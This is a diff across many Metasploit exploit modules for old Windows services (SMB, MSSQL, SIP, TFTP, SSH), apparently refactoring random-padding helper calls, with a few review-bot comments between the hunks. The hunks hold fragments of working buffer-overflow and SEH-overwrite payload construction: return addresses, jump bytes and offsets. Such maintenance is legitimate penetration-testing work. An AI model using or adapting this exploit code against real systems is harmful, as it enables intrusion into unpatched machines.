print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_alphanumeric(224, payload_badchars)
|
sploit = rand_text_alphanumeric(224, payload_badchars)
|
||||||
sploit << payload.encoded + "\xeb\x06" + make_nops(2)
|
sploit << payload.encoded + "\xeb\x06" + make_nops(2)
|
||||||
sploit << [target.ret].pack('V') + [0xe8, -450].pack('CV') + "\r\n"
|
sploit << [target.ret].pack('V') + [0xe8, -450].pack('CV') + "\r\n"
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -69,14 +69,14 @@ class Exploits::Windows::Misc::Shixxnote_font < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
sploit = Rex::Text.rand_text_alpha_upper(8, payload_badchars)
|
sploit = rand_text_alpha_upper(8, payload_badchars)
|
||||||
sploit += "~~"
|
sploit += "~~"
|
||||||
sploit += Rex::Text.rand_text_alpha_upper(118, payload_badchars)
|
sploit += rand_text_alpha_upper(118, payload_badchars)
|
||||||
|
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
|
|
||||||
sploit[112, seh.length] = seh
|
sploit[112, seh.length] = seh
|
||||||
sploit += Rex::Text.rand_text_alpha_upper(200, payload_badchars)
|
sploit += rand_text_alpha_upper(200, payload_badchars)
|
||||||
sploit += "~" * 10
|
sploit += "~" * 10
|
||||||
|
|
||||||
sock.put(sploit)
|
sock.put(sploit)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -89,7 +89,7 @@ class Exploits::Windows::Mssql::MS02_039_ResOverflow < Msf::Exploit::Remote
|
||||||
print_status("Execute 'net start sqlserveragent' once access is obtained");
|
print_status("Execute 'net start sqlserveragent' once access is obtained");
|
||||||
|
|
||||||
# \x68:888 => push dword 0x3838383a
|
# \x68:888 => push dword 0x3838383a
|
||||||
buf = "\x04" + Rex::Text.rand_text_english(800, payload_badchars) + "\x68:888"
|
buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"
|
||||||
|
|
||||||
# Return to the stack pointer
|
# Return to the stack pointer
|
||||||
buf[ 97, 4] = [target.ret].pack('V')
|
buf[ 97, 4] = [target.ret].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -80,14 +80,14 @@ class Exploits::Windows::Mssql::MS02_056_HelloOverflow < Msf::Exploit::Remote
|
||||||
buf = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b" +
|
buf = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b" +
|
||||||
"\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" +
|
"\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" +
|
||||||
"\x10\x00\x00\x00" +
|
"\x10\x00\x00\x00" +
|
||||||
Rex::Text.rand_text_english(528, payload_badchars) +
|
rand_text_english(528, payload_badchars) +
|
||||||
"\x1B\xA5\xEE\x34" +
|
"\x1B\xA5\xEE\x34" +
|
||||||
Rex::Text.rand_text_english(4, payload_badchars) +
|
rand_text_english(4, payload_badchars) +
|
||||||
[ target['Rets'][0] ].pack('V') +
|
[ target['Rets'][0] ].pack('V') +
|
||||||
[ target['Rets'][1], target['Rets'][1] ].pack('VV') +
|
[ target['Rets'][1], target['Rets'][1] ].pack('VV') +
|
||||||
'3333' +
|
'3333' +
|
||||||
[ target['Rets'][1], target['Rets'][1] ].pack('VV') +
|
[ target['Rets'][1], target['Rets'][1] ].pack('VV') +
|
||||||
Rex::Text.rand_text_english(88, payload_badchars) +
|
rand_text_english(88, payload_badchars) +
|
||||||
payload.encoded +
|
payload.encoded +
|
||||||
"\x00\x24\x01\x00\x00"
|
"\x00\x24\x01\x00\x00"
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -73,7 +73,7 @@ class Exploits::Windows::Proxy::Bluecoat_WinProxy_Host < Msf::Exploit::Remote
|
||||||
|
|
||||||
sploit = "GET / HTTP/1.1" + "\r\n"
|
sploit = "GET / HTTP/1.1" + "\r\n"
|
||||||
sploit += "Host: 127.0.0.1:"
|
sploit += "Host: 127.0.0.1:"
|
||||||
sploit += Rex::Text.rand_text_english(31, payload_badchars)
|
sploit += rand_text_english(31, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
sploit[23, seh.length] = seh
|
sploit[23, seh.length] = seh
|
||||||
sploit += "\r\n\r\n"
|
sploit += "\r\n\r\n"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -69,7 +69,7 @@ class Exploits::Windows::Proxy::ProxyPro_Http_Get < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
sploit = "GET /" + Rex::Text.rand_text_english(3603, payload_badchars)
|
sploit = "GET /" + rand_text_english(3603, payload_badchars)
|
||||||
sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)
|
sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)
|
||||||
sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n"
|
sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n"
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -65,9 +65,9 @@ class Exploits::Windows::Sip::Aim_Triton_Cseq < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect_udp
|
connect_udp
|
||||||
|
|
||||||
user = Rex::Text.rand_text_english(2, payload_badchars)
|
user = rand_text_english(2, payload_badchars)
|
||||||
port = rand(65535).to_s
|
port = rand(65535).to_s
|
||||||
filler = Rex::Text.rand_text_english(792, payload_badchars)
|
filler = rand_text_english(792, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
filler[780, seh.length] = seh
|
filler[780, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -70,9 +70,9 @@ class Exploits::Windows::Sip::Sipfoundry_CSeq < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
user = Rex::Text.rand_text_english(2, payload_badchars)
|
user = rand_text_english(2, payload_badchars)
|
||||||
port = rand(65535).to_s
|
port = rand(65535).to_s
|
||||||
filler = Rex::Text.rand_text_english(260, payload_badchars)
|
filler = rand_text_english(260, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
filler[252, seh.length] = seh
|
filler[252, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -65,9 +65,9 @@ class Exploits::Windows::Sip::Sipxphone_Cseq < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect_udp
|
connect_udp
|
||||||
|
|
||||||
user = Rex::Text.rand_text_english(2, payload_badchars)
|
user = rand_text_english(2, payload_badchars)
|
||||||
port = rand(65535).to_s
|
port = rand(65535).to_s
|
||||||
filler = Rex::Text.rand_text_english(212, payload_badchars)
|
filler = rand_text_english(212, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
filler[204, seh.length] = seh
|
filler[204, seh.length] = seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -88,7 +88,7 @@ class Exploits::Windows::Smb::MS03_049_NETAPI < Msf::Exploit::Remote
|
||||||
print_status("Building the stub data...")
|
print_status("Building the stub data...")
|
||||||
|
|
||||||
|
|
||||||
name = Rex::Text.rand_text_alphanumeric(5000)
|
name = rand_text_alphanumeric(5000)
|
||||||
name[3496, 4] = [target.ret].pack('V')
|
name[3496, 4] = [target.ret].pack('V')
|
||||||
name[3492, 2] = "\xeb\x06"
|
name[3492, 2] = "\xeb\x06"
|
||||||
name[3500, 5] = "\xe9" + [-3505].pack('V')
|
name[3500, 5] = "\xe9" + [-3505].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -105,7 +105,7 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
||||||
# jumps over the return address, some trash, and into the
|
# jumps over the return address, some trash, and into the
|
||||||
# final payload. Easy as pie.
|
# final payload. Easy as pie.
|
||||||
when /Windows 5\.0/
|
when /Windows 5\.0/
|
||||||
str = Rex::Text.rand_text_alphanumeric(3500)
|
str = rand_text_alphanumeric(3500)
|
||||||
str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
|
str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
|
||||||
str[2104, payload.encoded.length ] = payload.encoded
|
str[2104, payload.encoded.length ] = payload.encoded
|
||||||
string = NDR.UnicodeConformantVaryingString(str)
|
string = NDR.UnicodeConformantVaryingString(str)
|
||||||
|
@ -116,7 +116,7 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
||||||
# buffer, giving us about 1936 bytes of space for a
|
# buffer, giving us about 1936 bytes of space for a
|
||||||
# payload.
|
# payload.
|
||||||
when /Windows 5\.1/
|
when /Windows 5\.1/
|
||||||
str = Rex::Text.rand_text_alphanumeric(7000)
|
str = rand_text_alphanumeric(7000)
|
||||||
str[0, payload.encoded.length ] = payload.encoded
|
str[0, payload.encoded.length ] = payload.encoded
|
||||||
str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
|
str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
|
||||||
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
|
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
|
||||||
|
@ -138,8 +138,8 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
|
||||||
NDR.UnicodeConformantVaryingString('') +
|
NDR.UnicodeConformantVaryingString('') +
|
||||||
NDR.long(rand(0xFFFFFF)) +
|
NDR.long(rand(0xFFFFFF)) +
|
||||||
NDR.UnicodeConformantVaryingString('') +
|
NDR.UnicodeConformantVaryingString('') +
|
||||||
Rex::Text.rand_text(528) +
|
rand_text(528) +
|
||||||
Rex::Text.rand_text(528) +
|
rand_text(528) +
|
||||||
NDR.long(rand(0xFFFFFF))
|
NDR.long(rand(0xFFFFFF))
|
||||||
|
|
||||||
print_status("Trying to exploit #{os}")
|
print_status("Trying to exploit #{os}")
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -136,7 +136,7 @@ class Exploits::Windows::Smb::MS05_039_PNP < Msf::Exploit::Remote
|
||||||
NDR.long(0) + # CSD_LegacyDataOffset
|
NDR.long(0) + # CSD_LegacyDataOffset
|
||||||
NDR.long(req.length) + # CSD_LegacyDataSize
|
NDR.long(req.length) + # CSD_LegacyDataSize
|
||||||
NDR.long(0) + # CSD_Flags
|
NDR.long(0) + # CSD_Flags
|
||||||
Rex::Text.rand_text(16) + # GUID
|
rand_text(16) + # GUID
|
||||||
req # CSD_LegacyData
|
req # CSD_LegacyData
|
||||||
|
|
||||||
# PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0);
|
# PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0);
|
||||||
|
@ -188,20 +188,20 @@ class Exploits::Windows::Smb::MS05_039_PNP < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
# Pad the string up to reach our SEH frame
|
# Pad the string up to reach our SEH frame
|
||||||
buf = Rex::Text.rand_text(target['Offset'] ? target['Offset'] : 56)
|
buf = rand_text(target['Offset'] ? target['Offset'] : 56)
|
||||||
|
|
||||||
# Jump over the address and our invalid pointer to the payload
|
# Jump over the address and our invalid pointer to the payload
|
||||||
buf << Rex::Arch::X86.jmp_short('$+32')
|
buf << Rex::Arch::X86.jmp_short('$+32')
|
||||||
buf << Rex::Text.rand_text(2)
|
buf << rand_text(2)
|
||||||
|
|
||||||
# The SEH handler pointer
|
# The SEH handler pointer
|
||||||
buf << [target.ret].pack('V')
|
buf << [target.ret].pack('V')
|
||||||
|
|
||||||
# Some padding to reach the next pointer
|
# Some padding to reach the next pointer
|
||||||
buf << Rex::Text.rand_text(20)
|
buf << rand_text(20)
|
||||||
|
|
||||||
# ResourceName - cause access violation on RtlInitUnicodeString
|
# ResourceName - cause access violation on RtlInitUnicodeString
|
||||||
buf << Rex::Text.rand_text(3) + "\xff"
|
buf << rand_text(3) + "\xff"
|
||||||
|
|
||||||
# Append the encoded payload and we are good to go!
|
# Append the encoded payload and we are good to go!
|
||||||
buf << payload.encoded
|
buf << payload.encoded
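Review bot: `rand_text(target['Offset'] ? target['Offset'] : 56)` spells out a conditional that Ruby expresses as `rand_text(target['Offset'] || 56)`, assuming no target entry sets `'Offset'` to `false`; the shorter form reads as the default it is. Separately, `rand_text` is the all-bytes variant in Rex, so if the wrapper defaults badchars to `payload_badchars` the padding bytes in this hunk are now drawn from a smaller set than the old `Rex::Text.rand_text` calls produced — worth confirming that was intended. The `exploit` method continues past the hunk.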
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -98,21 +98,21 @@ class Exploits::Windows::Smb::MS06_025_RRAS < Msf::Exploit::Remote
|
||||||
pat =
|
pat =
|
||||||
payload.encoded +
|
payload.encoded +
|
||||||
"\xeb\x06" +
|
"\xeb\x06" +
|
||||||
Rex::Text.rand_text_alphanumeric(2) +
|
rand_text_alphanumeric(2) +
|
||||||
[target.ret].pack('V') +
|
[target.ret].pack('V') +
|
||||||
"\xe9\xb7\xfb\xff\xff"
|
"\xe9\xb7\xfb\xff\xff"
|
||||||
os = 'Windows 2000'
|
os = 'Windows 2000'
|
||||||
when /Windows 5\.1/
|
when /Windows 5\.1/
|
||||||
pat =
|
pat =
|
||||||
Rex::Text.rand_text_alphanumeric(0x4c) +
|
rand_text_alphanumeric(0x4c) +
|
||||||
"\xeb\x06" +
|
"\xeb\x06" +
|
||||||
Rex::Text.rand_text_alphanumeric(2) +
|
rand_text_alphanumeric(2) +
|
||||||
[target.ret].pack('V') +
|
[target.ret].pack('V') +
|
||||||
payload.encoded
|
payload.encoded
|
||||||
os = 'Windows XP'
|
os = 'Windows XP'
|
||||||
end
|
end
|
||||||
|
|
||||||
req = [1, 0x49].pack('VV') + pat + Rex::Text.rand_text_alphanumeric(0x4000-pat.length)
|
req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length)
|
||||||
len = req.length
|
len = req.length
|
||||||
stb =
|
stb =
|
||||||
NDR.long(0x20000) +
|
NDR.long(0x20000) +
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -192,31 +192,31 @@ class Exploits::Windows::Smb::MS06_040_NETAPI < Msf::Exploit::Remote
|
||||||
payload.encoded +
|
payload.encoded +
|
||||||
|
|
||||||
# Padding
|
# Padding
|
||||||
Rex::Text.rand_text_alphanumeric(target['Offset'] - payload.encoded.length) +
|
rand_text_alphanumeric(target['Offset'] - payload.encoded.length) +
|
||||||
|
|
||||||
# Land 6 bytes in to bypass garbage (XP SP0)
|
# Land 6 bytes in to bypass garbage (XP SP0)
|
||||||
[ target.ret + 6 ].pack('V') +
|
[ target.ret + 6 ].pack('V') +
|
||||||
|
|
||||||
# Padding
|
# Padding
|
||||||
Rex::Text.rand_text_alphanumeric(8) +
|
rand_text_alphanumeric(8) +
|
||||||
|
|
||||||
# Address to write our shellcode (XP SP0)
|
# Address to write our shellcode (XP SP0)
|
||||||
[ target.ret ].pack('V') +
|
[ target.ret ].pack('V') +
|
||||||
|
|
||||||
# Padding
|
# Padding
|
||||||
Rex::Text.rand_text_alphanumeric(32) +
|
rand_text_alphanumeric(32) +
|
||||||
|
|
||||||
# Jump straight to shellcode (XP SP1)
|
# Jump straight to shellcode (XP SP1)
|
||||||
[ target.ret ].pack('V') +
|
[ target.ret ].pack('V') +
|
||||||
|
|
||||||
# Padding
|
# Padding
|
||||||
Rex::Text.rand_text_alphanumeric(8) +
|
rand_text_alphanumeric(8) +
|
||||||
|
|
||||||
# Address to write our shellcode (XP SP1)
|
# Address to write our shellcode (XP SP1)
|
||||||
[ target.ret ].pack('V') +
|
[ target.ret ].pack('V') +
|
||||||
|
|
||||||
# Padding
|
# Padding
|
||||||
Rex::Text.rand_text_alphanumeric(32) +
|
rand_text_alphanumeric(32) +
|
||||||
|
|
||||||
# Terminate the path
|
# Terminate the path
|
||||||
"\x00\x00"
|
"\x00\x00"
|
||||||
|
@ -232,7 +232,7 @@ class Exploits::Windows::Smb::MS06_040_NETAPI < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
when /stack/
|
when /stack/
|
||||||
buff = Rex::Text.rand_text_alphanumeric(800)
|
buff = rand_text_alphanumeric(800)
|
||||||
buff[0, payload.encoded.length] = payload.encoded
|
buff[0, payload.encoded.length] = payload.encoded
|
||||||
buff[ target['OffsetA'], 4 ] = [target.ret].pack('V')
|
buff[ target['OffsetA'], 4 ] = [target.ret].pack('V')
|
||||||
buff[ target['OffsetB'], 5 ] = "\xe9" + [ (target['OffsetA'] + 5) * -1 ].pack('V')
|
buff[ target['OffsetB'], 5 ] = "\xe9" + [ (target['OffsetA'] + 5) * -1 ].pack('V')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -86,14 +86,14 @@ class Exploits::Windows::Smb::MS06_066_NWAPI < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Add giant blocks of guard data before and after the egg
|
# Add giant blocks of guard data before and after the egg
|
||||||
eggdata =
|
eggdata =
|
||||||
Rex::Text.rand_text(1024) +
|
rand_text(1024) +
|
||||||
egg +
|
egg +
|
||||||
egg +
|
egg +
|
||||||
payload.encoded +
|
payload.encoded +
|
||||||
Rex::Text.rand_text(1024)
|
rand_text(1024)
|
||||||
|
|
||||||
buflen = 295
|
buflen = 295
|
||||||
ofstring = Rex::Text.to_unicode('\\\\') + "\x90" + hunter[0] + Rex::Text.rand_text(buflen-hunter[0].length) +
|
ofstring = Rex::Text.to_unicode('\\\\') + "\x90" + hunter[0] + rand_text(buflen-hunter[0].length) +
|
||||||
[ target.ret ].pack('V') + "\x00"
|
[ target.ret ].pack('V') + "\x00"
|
||||||
#ofstring = Rex::Text.to_unicode('\\\\') + payload.encoded + [ target.ret ].pack('V') + "\x00\x00"
|
#ofstring = Rex::Text.to_unicode('\\\\') + payload.encoded + [ target.ret ].pack('V') + "\x00\x00"
|
||||||
stubdata =
|
stubdata =
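Review bot: The commented-out alternative `#ofstring = Rex::Text.to_unicode('\\\\') + payload.encoded + ...` directly below the live `ofstring` assignment is dead code that the commit leaves untouched; a reader cannot tell whether it is an abandoned variant or a pending switch. Either delete it or replace it with a real comment that states why the `hunter[0]`-based form is used instead. The surrounding method starts and ends outside the hunk.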
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -77,16 +77,16 @@ class Exploits::Windows::Smb::MS06_066_NWWKS < Msf::Exploit::Remote
|
||||||
# [in] [unique] wchar *
|
# [in] [unique] wchar *
|
||||||
# [out] long
|
# [out] long
|
||||||
|
|
||||||
ofstring = Rex::Text.to_unicode('\\\\') + Rex::Text.rand_text(292) + [ target.ret ].pack('V') + "\x00\x00"
|
ofstring = Rex::Text.to_unicode('\\\\') + rand_text(292) + [ target.ret ].pack('V') + "\x00\x00"
|
||||||
stubdata =
|
stubdata =
|
||||||
NDR.long(rand(0xffffffff)) +
|
NDR.long(rand(0xffffffff)) +
|
||||||
NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
|
NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
|
||||||
NDR.long(rand(0xffffffff)) +
|
NDR.long(rand(0xffffffff)) +
|
||||||
NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") +
|
NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") +
|
||||||
NDR.long(rand(0xffffffff)) +
|
NDR.long(rand(0xffffffff)) +
|
||||||
NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
|
NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
|
||||||
NDR.long(rand(0xffffffff)) +
|
NDR.long(rand(0xffffffff)) +
|
||||||
NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
|
NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
|
||||||
NDR.UnicodeConformantVaryingStringPreBuilt(ofstring)
|
NDR.UnicodeConformantVaryingStringPreBuilt(ofstring)
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -88,7 +88,7 @@ class Exploits::Windows::Smtp::MS06_019_EXCHANGE < Msf::Exploit::Remote
|
||||||
modproplong << modprops[rand(modprops.size)] + ","
|
modproplong << modprops[rand(modprops.size)] + ","
|
||||||
}
|
}
|
||||||
|
|
||||||
boundry = Rex::Text.rand_text_alphanumeric(8) + "." + Rex::Text.rand_text_alphanumeric(8)
|
boundry = rand_text_alphanumeric(8) + "." + rand_text_alphanumeric(8)
|
||||||
|
|
||||||
|
|
||||||
# Really, the randomization above only crashes /sometimes/ - it's MUCH more
|
# Really, the randomization above only crashes /sometimes/ - it's MUCH more
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -68,8 +68,8 @@ class Exploits::Windows::Ssh::Freesshd_key_exchange < Msf::Exploit::Remote
|
||||||
sploit = "SSH-2.0-OpenSSH_3.9p1"
|
sploit = "SSH-2.0-OpenSSH_3.9p1"
|
||||||
sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
|
sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
|
||||||
sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
|
sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
|
||||||
sploit << Rex::Text.rand_text_alphanumeric(1055) + [target.ret].pack('V')
|
sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
|
||||||
sploit << payload.encoded + Rex::Text.rand_text_alphanumeric(19000) + "\r\n"
|
sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"
|
||||||
|
|
||||||
res = sock.recv(22)
|
res = sock.recv(22)
|
||||||
if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/)
|
if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -64,7 +64,7 @@ class Exploits::Windows::Ssh::Securecrt_Ssh1 < Exploit::Remote
|
||||||
def on_client_connect(client)
|
def on_client_connect(client)
|
||||||
return if ((p = regenerate_payload(client)) == nil)
|
return if ((p = regenerate_payload(client)) == nil)
|
||||||
|
|
||||||
buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + Rex::Text.rand_text_english(243)
|
buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243)
|
||||||
buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded
|
buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded
|
||||||
|
|
||||||
print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")
|
print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")
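Review bot: `on_client_connect` assigns `p = regenerate_payload(client)` purely as a nil guard, but the buffer on the following lines is built from `payload.encoded`, not `p.encoded`. Whether that is correct depends on whether `regenerate_payload` updates the module's payload in place or only returns a fresh instance, which the hunk does not show; if it is the latter the line should read `buffer << [target.ret].pack('V') + make_nops(20) + p.encoded`, and if it is the former a comment `# regenerate_payload refreshes payload.encoded for this client; p is only checked for nil` would save the next reader the question. The method continues past the hunk.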
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -145,7 +145,7 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
|
||||||
if (datastore['PROTO'] == 'smtp')
|
if (datastore['PROTO'] == 'smtp')
|
||||||
greeting = sock.get_once
|
greeting = sock.get_once
|
||||||
|
|
||||||
sock.put('HELO ' + (Rex::Text.rand_text_alphanumeric(rand(10)+1)) + "\r\n")
|
sock.put('HELO ' + (rand_text_alphanumeric(rand(10)+1)) + "\r\n")
|
||||||
resp = sock.get_once
|
resp = sock.get_once
|
||||||
|
|
||||||
sock.put("STARTTLS\r\n")
|
sock.put("STARTTLS\r\n")
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -79,8 +79,8 @@ class Exploits::Windows::Tftp::Futuresoft_TFTPD_TransferMode < Msf::Exploit::Rem
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
sploit = "\x00\x01" + Rex::Text.rand_text_english(14, payload_badchars) + "\x00"
|
sploit = "\x00\x01" + rand_text_english(14, payload_badchars) + "\x00"
|
||||||
sploit += Rex::Text.rand_text_english(167, payload_badchars)
|
sploit += rand_text_english(167, payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
sploit[157, seh.length] = seh
|
sploit[157, seh.length] = seh
|
||||||
sploit += "\x00"
|
sploit += "\x00"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -73,9 +73,9 @@ class Exploits::Windows::Tftp::Tftpd32_Long_Filename < Msf::Exploit::Remote
|
||||||
|
|
||||||
sploit =
|
sploit =
|
||||||
"\x00\x01" +
|
"\x00\x01" +
|
||||||
Rex::Text.rand_text_english(120, payload_badchars) +
|
rand_text_english(120, payload_badchars) +
|
||||||
"." +
|
"." +
|
||||||
Rex::Text.rand_text_english(135, payload_badchars) +
|
rand_text_english(135, payload_badchars) +
|
||||||
[target.ret].pack('V') +
|
[target.ret].pack('V') +
|
||||||
payload.encoded +
|
payload.encoded +
|
||||||
"\x00"
|
"\x00"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -76,7 +76,7 @@ class Exploits::Windows::Unicenter::CAM_LOG_SECURITY < Msf::Exploit::Remote
